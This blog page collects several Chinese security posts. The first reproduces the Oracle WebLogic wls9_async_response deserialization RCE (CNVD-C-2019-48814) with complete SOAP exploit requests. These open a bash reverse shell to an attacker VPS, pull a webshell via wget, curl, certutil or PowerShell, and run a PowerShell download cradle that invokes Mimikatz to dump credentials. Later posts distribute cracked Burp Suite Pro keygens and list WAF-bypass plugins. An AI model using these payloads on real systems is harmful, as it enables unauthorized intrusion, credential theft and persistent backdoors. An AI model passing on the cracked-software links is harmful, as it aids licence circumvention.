CNVD-C-2019-48814 Weblogic wls9_async_response 反序列 渗透测试

0x1.背景

首先,CNVD收录了由中国民生银行股份有限公司报送的Oracle WebLogic wls9-async反序列化远程命令执行漏洞(CNVD-C-2019-48814)。

0x2.漏洞描述

攻击者利用该漏洞,可在未授权的情况下远程执行命令。从相关信息来看。 部分版本WebLogic中默认包含的wls9_async_response包,为WebLogic Server提供异步通讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者可以发送精心构造的恶意 HTTP 请求,获得目标服务器的权限,在未授权的情况下远程执行命令。 也就是说漏洞出现在 wls9_async_response.war 这个包里面,来详细看一看

0x3.影响范围 

主要影响以下版本:

WebLogic Server 10.3.6.0

WebLogic Server 12.1.3.0

WebLogic Server 12.2.1.3

0x4.复现漏洞环境 

而今天复现的就是第一个版本,即WebLogic Server 10.3.6.0(wls1036_generic.jar)。

Kali2019\Win10(关闭安全中心实时防护下)

漏洞组件:bea_wls9_async_response.war

漏洞路径:http://ip:port/_async/AsyncResponseService

漏洞确认:访问漏洞路径存在以下页面,即有可能存在漏洞

WebLogic高危漏洞复现.png

漏洞利用(所有利用都需要被攻击机能够访问公网):

所有的POST报文都可以使用burpsuite完成,burpsuite破解、汉化、插件等相关教程:传送门


一、Linux下

1、反弹shell

POST如下报文即可:

POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 853
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/vpsip/vpsport 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>



Linux下反弹shell.jpg



2、上传webshell


  1. 放置一个webshell.txt到公网
  2. POST以下报文 任选其一

报文一:

POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 789
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://vpsip:vpsport/webshell.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>  

报文二:

POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 789
Accept-Encoding: gzip, deflate
SOAPAction: 
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/bash</string></void><void index="1"><string>-c</string></void><void index="2"><string>curl http://vpsip:vpsport/webshell.txt -o servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string></void></array><void method="start"/></void></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>

3、访问webshell



http://ip:port/_async/webshell.jsp



Linux下访问shell.png



二、Windows下 

1、反弹shell

可直接使用黑客工具-后渗透工具-CobaltStrike生成一个payload.ps1 powershell脚本,将该脚本放到公网上,然后使用如下报文即可

POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 861
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell "IEX (New-Object Net.WebClient).DownloadString('http://ip:port/payload.ps1'); Invoke-Mimikatz -DumpCreds"</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

win下反弹shell.jpg



2、上传webshell

  1. 放置一个webshell.txt到公网
  2. 使用以下报文 任选其一均可



报文一:


POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 854
Accept-Encoding: gzip, deflate
SOAPAction: 
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>cmd</string></void><void index="1"><string>/c</string></void><void index="2"><string>powershell (new-object System.Net.WebClient).DownloadFile( 'http://ip:port/webshell.txt','servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp')</string></void></array><void method="start"/></void></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>

报文二:


POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 854
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>certutil -urlcache -split -f http://ip:port/webshell.txt servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
3.访问webshell
http://ip:port/_async/webshell.jsp

win下访问shell.jpg

(注:上述报文中servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/为默认路径,如果路径修改,可以配合反弹shell进行获取)

0x5.缓解措施

高危:预计网上很快会有该远程代码执行漏洞的POC,建议尽快升级软件和使用连接筛选器临时拒绝T3/T3s协议。

建议尽快安装安全更新补丁(可以使用BSU智能更新)或使用连接筛选器临时阻止外部访问7001端口的T3/T3s协议:

连接筛选器:weblogic.security.net.ConnectionFilterImpl

规则示例: 0.0.0.0/0 7001 deny t3 t3s#拒绝所有访问

允许和拒绝指定IP规则示例:

192.168.1.0/24
7001 allow t3 t3s#允许指定IP段访问

192.168.2.0/24 * 7001 deny t3 t3s#拒绝指定IP段访问

连接筛选器说明参考:

https://docs.oracle.com/cd/E24329_01/web.1211/e24485/con_filtr.htm#SCPRG377

威胁推演:此漏洞为远程代码执行漏洞,基于全球使用该产品用户的数量和暴露在网上的端口情况,恶意攻击者可能会开发针对该漏洞的自动化攻击程序、黑客工具,实现漏洞利用成功后自动植入后门程序,并进一步释放矿工程序或是DDOS僵尸木马等恶意程序,从而影响到网站服务的正常提供。

安全运营建议:Oracle WebLogic历史上已经报过多个安全漏洞(其中也有反序列化漏洞),建议使用该产品的企业经常关注官方安全更新公告。



来源:https://bithack.io/forum/152&nbsp;

修正:此前没看急于发文,导致写错标题,对不起大家。感谢评论有个兄弟说出来,谢谢!


admin 发布于  2019-10-17 20:14 

Burp_Suite_Pro_v2.1.04_Loader_Keygen下载 安全工具

声明:资源来自吾爱,仅供学习研究使用,其他burpsuite相关教程请查看博客相关标签或者搜索:https://mrxn.net/tag/burpsuite

此次更新的是来自吾爱的scz分析发布的。我这里是作为搬运更新以下,其他有关burpsuite插件、书籍都在我的GitHub,请自行前往查看。

Burp_Suite_Pro_v2.1.04_Loader_Keygen.png

Burp_Suite_Pro_v2.1.04_Loader_Keygen。

下载burpsuite请注意校对md5值,谨防携带“私货”!

File:Burp_Suite_Pro_v2.1.04_Loader_Keygen.zip
Size: 298981924 bytes
Modified: 2019年10月17日, 12:01:55
MD5: ECF77640BCABCBF55CE2067836D80943
SHA1: 53283303A28EF4F1FC78D387BE821077EC9B15E8
CRC32: 16D9A77D



burpsuite pro 2.1.04下载连接: https://mir.cr/MZVYTZIL



admin 发布于  2019-10-17 12:06 

雷电模拟器配合Burpsuite抓取模拟器APP数据+使用adb清空和导入联系人 技术文章

前言:

    我们在做渗透测试的时候,我们往往需要使用burpsuite抓取 APP流量,需要抓取APP数据进行测试,因为往往通过APP都能有不错的发现,但是为了方便测试,我们如果没有安卓机的情况下,使用模拟器就是一个不错的选择,其一不需要另行准备安卓手机,其二也可以避免一些垃圾APP给自己造成不必要的麻烦,如锁机APP或者是近段时间闹得沸沸扬扬的送给最好的TA,这些APP。

    需要准备的软件如下:雷电模拟器、burpsuite、需要测试的APP,雷电模拟器和 APP 直接去官网下载安装即可,burpsuite 相关软件资料可以查看我在 GitHub 上面的资源,应该还算全面,同时也希望大家贡献好的插件或则是文章,我会收录进去,最后夹带点私货(: 帮我点点star啊!谢谢!

总的步骤大致分为以下几步,其中每一步我都会在下面都有详细的图文介绍:1)电脑端设置好 burpsuite 的代理;2)模拟器设置代理;3)模拟器下载并安装证书并使用Android浏览器访问SSL网站验证SSL代理是否成功;4)打开APP开始抓取流量测试

0x01 电脑端设置好 burpsuite 的代理

    首先我们通过 windows+R 运行 cmd, 通过 ipconfig /all 命令 找到自己的网卡的 IPv4 地址,这一步也可以根据自己的习惯了操作,比如通过 控制面板\网络和 Internet\网络连接 或 其他方式。我这里的 IPv4 地址是 192.168.6.244 ,这个 IPv4 地址记住,后面设置 burpsuite 的代理和 模拟器设置代理 都需要用到。

ipconfig.png

确认自己的 IPv4 地址后就可以设置 burpsuite 的代理设置了:绑定监听端口(Bind to port) 8080 (端口必须是未占用的端口,你可以设置高位端口),绑定监听地址( Bind to address) 我们选择 Specific address 192.168.6.244 在列表里选择刚刚查到的 IPv4 地址。自此 burpsuite 就设置好了。

burp-proxy-setting.png

0x02 模拟器设置代理

    模拟器设置代理需要修改 设置 --> WLAN --> 鼠标左键长按 tplink --> 修改网络 --> 代理选择手动 --> 代理服务器主机名填写 刚刚的 IPv4 地址 192.168.6.244,代理服务器端口 填写刚刚 burpsuite 设置的 8080 ,然后保存,现在使用 Android 浏览器打开 http 网站在 burpsuite 就可以看到流量了。

android-wlan-proxy1.png 

android-wlan-proxy2.png

0x03 模拟器下载并安装证书并使用Android浏览器访问SSL网站验证SSL代理是否成功

    如上面设置后好,就会发现打开使用了SSL证书的 https 站点会提示: 该网站的安全证书有问题。not-install-cert.png

burpsuite 此时肯定是不能抓到流量的,因此我们需要给模拟器配置 burpsuite 的证书,我们使用 Android 浏览器访问 http://burp/ 或者 http://192.168.6.244:8080/ 即可看到 burpsuite 的证书下载页面,我们点击 CA Certificate 即可下载证书:

android-download-cert.png

一般默认在 文件管理器的 Download 目录下 文件名为 cacert.der 我们需要把它后缀改为pem,即重名为 cacert.pem 

install-cert-error.pngcert-download-path.png 

然后打开 设置 --> 安全 --> 从SD卡安装(从SD卡安装证书),找到下载的证书路径,默认就是 内部储存的 Download目录下,我们刚刚重命名过的证书,如果不重命名,Android 是不识别的。

 install-cert.png



选择证书后,如果提示 需要先设置锁屏 PIN 或 密码才能使用凭据,就先去设置好 PIN 或 密码

seting-ping.png 

然后根据提示填写 证书名字、凭据用途默认 WLAN 即可,然后确定,

install-cert-rename.png 

install-cert-success.png

系统会提示安装成功!我们也可以从 设置 --> 安全 --> 信任的凭据 --> 用户 可以看到我们安装的 PortSwigger。最后使用浏览器访问 https://www.baidu.com burpsuite 应该就可以抓到流量了。

 check-cert.png

0x04 打开APP开始抓取流量测试

    打开APP开始抓取流量测试,如果APP没有做其他的防护措施比如加固等等,burpsuite 应该就可以看到流量了。如果不能抓到 APP 流量但是可以抓取 Android 浏览器流量,这个时候就需要 脱壳APP或者是借助 Frida 这些来协助抓取,下次写。

all-done.png 

finish.png



下面简单说一下 如何通过雷电模拟器的 adb.exe 来直接执行命令进行 清空和导入联系人到模拟器的通讯录(比如批量生成一定范围的手机号,去做QQ好友/微信匹配等等,希望你看到了不作恶)。

雷电模拟器通讯录格式如下:

BEGIN:VCARD

VERSION:2.1

N:;1-300-000-0000;;;

FN:1-300-000-0000

TEL;CELL:1-300-000-0000

END:VCARD

BEGIN:VCARD

VERSION:2.1

N:;1-300-933-0788;;;

FN:1-300-933-0788

TEL;CELL:1-300-933-0788

END:VCARD

其他模拟器或手机的通讯录格式,可以通过手动添加一个号码,然后导出到 sdcard 查看,即可使用python这些小脚本批量生成,不做过多的陈述。

雷电模拟器 adb 清空、导入联系人如下:

# 列出设备

PS D:\ChangZhi\dnplayer2> .\adb.exe  devices

List of devices attached

emulator-5554   device

127.0.0.1:5555  offline

# 先清除原通讯录联系人

PS D:\ChangZhi\dnplayer2> .\adb.exe -s emulator-5554 shell pm clear com.android.providers.contacts

Success

# 将正确格式的通讯录文件contacts.vcf, 导入android模拟器中, 并等待模拟器刷新几秒钟

PS D:\ChangZhi\dnplayer2> .\adb.exe -s emulator-5554 push contacts.vcf /sdcard/contacts.vcf

2596 KB/s (12978 bytes in 0.004s)

PS D:\ChangZhi\dnplayer2> sleep 3

#从文件中, 将联系人import到android模拟器的通讯录中, 导入过程耗时依联系人数量而定.

PS D:\ChangZhi\dnplayer2> .\adb.exe -s emulator-5554 shell am start -t "text/x-vcard" -d "file:///sdcard/contacts.vcf" -a android.intent.action.VIEW com.android.contacts

Starting: Intent { act=android.intent.action.VIEW dat=file:///sdcard/contacts.vcf typ=text/x-vcard pkg=com.android.contacts }

PS D:\ChangZhi\dnplayer2> sleep 10

标签: burpsuite

admin 发布于  2019-9-30 21:44 

解决burpsuite拦截Firefox或chrome的一些无用报文数据 技术文章

前言:

        在我们使用 burpsuite 进行渗透测试或其他抓包APP测试的时候,经常会在 burpsuite 里面出现大量的无用报文数据,比如使用 Firefox 配合 burpsuite 抓包时经常出现:

http://detectportal.firefox.com/success.txt ,重点是这个包 Forward 和 Drop还会点不动!

这些大量的报文严重影响我们的工作效率!我就我的经验分享给大家,同时做个笔记。

        要解决上面这个问题很简单,可以在 Firefox 浏览器里关闭或者是我后面说的直接在 burpsuite 里面使用正则过滤,先说一下如何在浏览器里关闭这个报文:

在地址栏输入: about:config 回车进入,---> 我了解此风险 ---> 搜索 : network.captive-portal-service.enabled ---> 双击将 值改为false,OK,就关掉了。

        但是,在我们测试的时候有时候出现大量的无关的子域名或者是暂时先屏蔽某个子域名的信息,不让它显示在 burpsuite 的 target 里面


admin 发布于  2019-7-30 13:25 

BurpSuite Pro破解版[BurpSuite Cracked version]+汉化脚本(windows)+常用插件(sqlmap.jar,bypasswaf.jar等)分享 安全工具

来博客除草了,上一篇博文都是去年12月的了,因为从去年9月开始就上班,期间还有其他的杂七杂八的事情....编不下去了,就是懒!大写的!哈哈哈,生活就是如此,你得到一些的同时就会失去一些,吾等凡人逃不过类似这样的定律,只能在此基础上尽可能的活得好一点,仅此而已,朋友加油!
今天是来分享一下渗透测试中人人熟知(如果你不知道,就不是这类人?)的BurpSuite——以下介绍来自维基百科:
Burp 或 Burp Suite(饱嗝套装)是一个用于测试 Web 应用程序安全性的图形化工具。该工具使用Java编写,由PortSwigger Web Security开发。该工具有三个版本。可以免费下载的社区版、专业版和试用后可以购买的企业版。社区版大大减少了功能。它是为Web应用程序安全检查提供全面解决方案而开发的。除了代理服务器、Scanner 和Intruder等基本功能外,该工具还包含更高级的选项,如Spider、Repeater、Decoder、Comparer、Extender和Sequencer。PortSwigger由Web安全领域的领先专家Dafydd Stuttard于2004年创建。[凑字数结束-_-]
    今天分享的是BurpSuite Pro破解版(BurpSuite Cracked version)v1.7.37,其实也可以用于2.0版本的破解,详细的使用破解教程可以参考这里:BurpSuite 1.7.32 Cracked 破解版[注册机]下载【无后门版】,不过前阵子在先知上有朋友发了一个汉化的教程,但是需要手动输入这些命令而且还容易出错,故,我在此基础上写了个一键自动生成桌面快捷方式加上汉化启动。先上图各位看看效果:BurpSuite破解版汉化脚本.gif


说一下包里的几个插件:

plugins.png

burp-vulners-scanner-1.2.jar --- burp 根据Vulners.com提供的漏洞库扫描通过burp的请求是否存在漏洞 

地址:https://github.com/vulnersCom/burp-vulners-scanner

bypasswaf.jar 就如其名bypass 一些waf

地址:https://www.codewatch.org/blog/?p=408

chunked-coding-converter.0.2.1.jar 国人c0ny1最新版 burp分块输出,也是对抗waf的插件

地址:https://github.com/c0ny1/chunked-coding-converter

sqlmap.jar 联合本地sqlmap 进行注入测试,当然burp插件商店上还有一款 sqli-py(地址:https://github.com/portswigger/sqli-py)可以直接安装就不叙述了

所有插件以及脚本下载地址:https://github.com/Mr-xn/BurpSuite-collections

当然了,以上的这些我的这个项目也都有搜集,如果你有好的burp插件或者相关文章都可以push过来,大家一起力量才是最大。

有能力请购买正版!

致敬所有开源的项目作者!

注意:禁止使用本项目所有软件及其文章等资源进行非法测试!


参考如下链接及其文章:
SQLiPy: A SQLMap Plugin for Burp :https://www.codewatch.org/blog/?p=402
Burp Suite Pro Loader&Keygen By surferxyz(更新新版,附带v1.7.37原版): https://www.52pojie.cn/thread-691448-1-1.html
BurpSuite 1.6~2.x版本汉化版工具: https://xz.aliyun.com/t/3846
burpsuite扩展集成sqlmap插件: https://www.cnblogs.com/tdcqma/p/6145469.html

相关教程书籍:
Burp Suite 实战指南 :https://t0data.gitbooks.io/burpsuite/content/
Burp Suite新手指南 https://www.freebuf.com/articles/web/100377.html



admin 发布于  2019-3-28 22:10 

BurpSuite 1.7.32 Cracked 破解版[注册机]下载【无后门版】 安全工具

update:如果你是Linux系统比如,Kali,自带的jdk版本过高,激活失败,请参照这个教程配置适合的jdk版本。最新版 burpsuite_pro_v1.7.37汉化破解版

之前也在博客分享了多个版本的BurpSuite知名渗透测试套件BurpSuite Pro v1.7.12破解版 

最近网上出了新版本的得BurpSuite ,搜了一下很多地方可以下载,但是其中有不少包含后门,因此呢,Google搜索找了一会儿,找到了原版出处,在此分享给大家,同时呢,也作为存档存在博客。使用很简单:

首先看一下我的注册后的:

 shotpic_2018-02-09_15-03-44.png

注册机的使用也很简单,首先打开burp-loader-keygen.jar文件,然后随便填写license text,比如我填写的是:mrxn.net效果如下图:

shotpic_2018-02-09_15-01-01.png

然后点击manual activation(手动激活):

2.png

接下来将request 粘贴到activation request ,将自动生成response,再粘贴到burp里最下面的response中,点击next下一步即可:

3.png

激活成功:

4.png

下载后请注意验证hash值:

Burp_Suite_Pro_v1.7.32_Loader_Keygen\Burp_Suite_Pro_v1.7.32_Loader_Keygen\burp-loader-keygen.jar
Size: 65220 bytes
Modified: 2018年1月25日, 17:01:33
MD5: A4A02E374695234412E2C66B0649B757
SHA1: 63EF57AA0FD7FDB6F6D2171CF946177C9C23B195
CRC32: 4F363E7B

Burp_Suite_Pro_v1.7.32_Loader_Keygen\Burp_Suite_Pro_v1.7.32_Loader_Keygen\burpsuite_pro_v1.7.32.jar
Size: 27955758 bytes
Modified: 2018年2月3日, 10:02:08
MD5: D4D43E44769B121CFD930A13A2B06B4C
SHA1: C6CD0BBE402B75F4806D76A04D251474308415B8
CRC32: 0FD2072A

两个下载地址,一个是rar(方便win平台用户)一个是7Z(Linux平台)

RAR下载: https://pan.lanzou.com/i0hpf0h  密码:mrxn
ZIP下载: https://pan.lanzou.com/i0hph1a  密码:mrxn

需要注意得地方:

今后用burpsuite 只需要先打开burp-loader-keygen.jar ,再点击一下run即可,无需重新激活 如果出现闪退,打不开等等兼容性问题,请下载更新最新版jdk,地址: https://www.java.com/zh_CN/download/  


admin 发布于  2018-2-9 15:24 

知名渗透测试套件BurpSuite Pro v1.7.12破解版 安全工具

burpsuitelogo.png

Burp Suite是一款信息安全从业人员必备的集 成型的渗透测试工具,它采用自动测试和半自动测试的方式,包含了 Proxy,Spider,Scanner,Intruder,Repeater,Sequencer,Decoder,Comparer等工具模块。通 过拦截HTTP/HTTPS的web数据包,充当浏览器和相关应用程序的中间人,进行拦截、修改、重放数据包进行测试,是web安全人员的一把必备的瑞士军刀。

功能

  • 拦截代理(Proxy),你可以检查和更改浏览器与目标应用程序间的流量;
  • 可感知应用程序的网络爬虫(Spider),它能完整的枚举应用程序的内容和功能;
  • 高级扫描器,执行后它能自动地发现web应用程序的安全漏洞;
  • 入侵测试工具(Intruder),用于执行强大的定制攻击去发现及利用不同寻常的漏洞;
  • 重放工具(Repeater),一个靠手动操作来触发单独的HTTP 请求,并分析应用程序响应的工具;
  • 会话工具(Sequencer),用来分析那些不可预知的应用程序会话令牌和重要数据项的随机性的工具;
  • 解码器,进行手动执行或对应用程序数据者智能解码编码的工具;
  • 扩展性强,可以让你加载Burp Suite的扩展,使用你自己的或第三方代码来扩展Burp Suit的功能。

1.7.12更新内容

  • SMTP interactions
  • SMTP external service interaction
  • SMTP header injection
  • private Burp Collaborator server

具体更新内容参见:http://releases.portswigger.net/2016/11/1712.html

由于11版本有卡顿情况与未知bug问题,特此更新一个12版本.

下载地址



2017-02-02-53.jpg

网盘下载: https://pan.baidu.com/s/1dFj4VoH 

本地下载: burpsuite_pro_v1.7.12.zip (解压密码:mrxn,感谢@Larry_Lau 大牛的分享).


admin 发布于  2017-2-2 12:51 

burpsuite v1.7.11更新了,licence到2017年12月 安全工具

众所周知,Burp Suite是响当当的web应用程序渗透测试集成平台。从应用程序攻击表面的最初映射和分析,到寻找和利用安全漏洞等过程,所有工具为支持整体测试程序而无缝地在一起工作。


平台中所有工具共享同一robust框架,以便统一处理HTTP请求、持久性、认证、上游代理、日志记录、报警和可扩展性。Burp Suite允许攻击者结合手工和自动技术去枚举、分析、攻击Web应用程序。

2016-12-05 11-47-31.png

下载地址:链接: https://pan.baidu.com/s/1pKP49aN                            码: 8v23


admin 发布于  2016-12-5 11:45 

burpsuite渗透测试实战指南八集+burpsuite_pro_v1.7.08破解版(含下载) 安全工具

1.png

burpsuite是什么我就不讲了,这些文档是别人写的,原文在:https://www.gitbook.com/book/t0data/burpsuite/details

文档包括完整PDF和分卷的word文档,更具自己的需求下载阅读,希望对你的渗透测试有所帮助。

burpsuite_pro_v1.7.08 下载:链接: http://pan.baidu.com/s/1bp7RVQJ 密码: 2t6n

文档下载:http://pan.baidu.com/s/1slTJXHb


最后,还有视频版的burpsuite教程,如果看不懂上面的文字版,那就看这个视频版的,哈哈。

2.png3.png

链接: http://pan.baidu.com/s/1kU8HsCf 密码: 5thn


admin 发布于  2016-11-27 10:26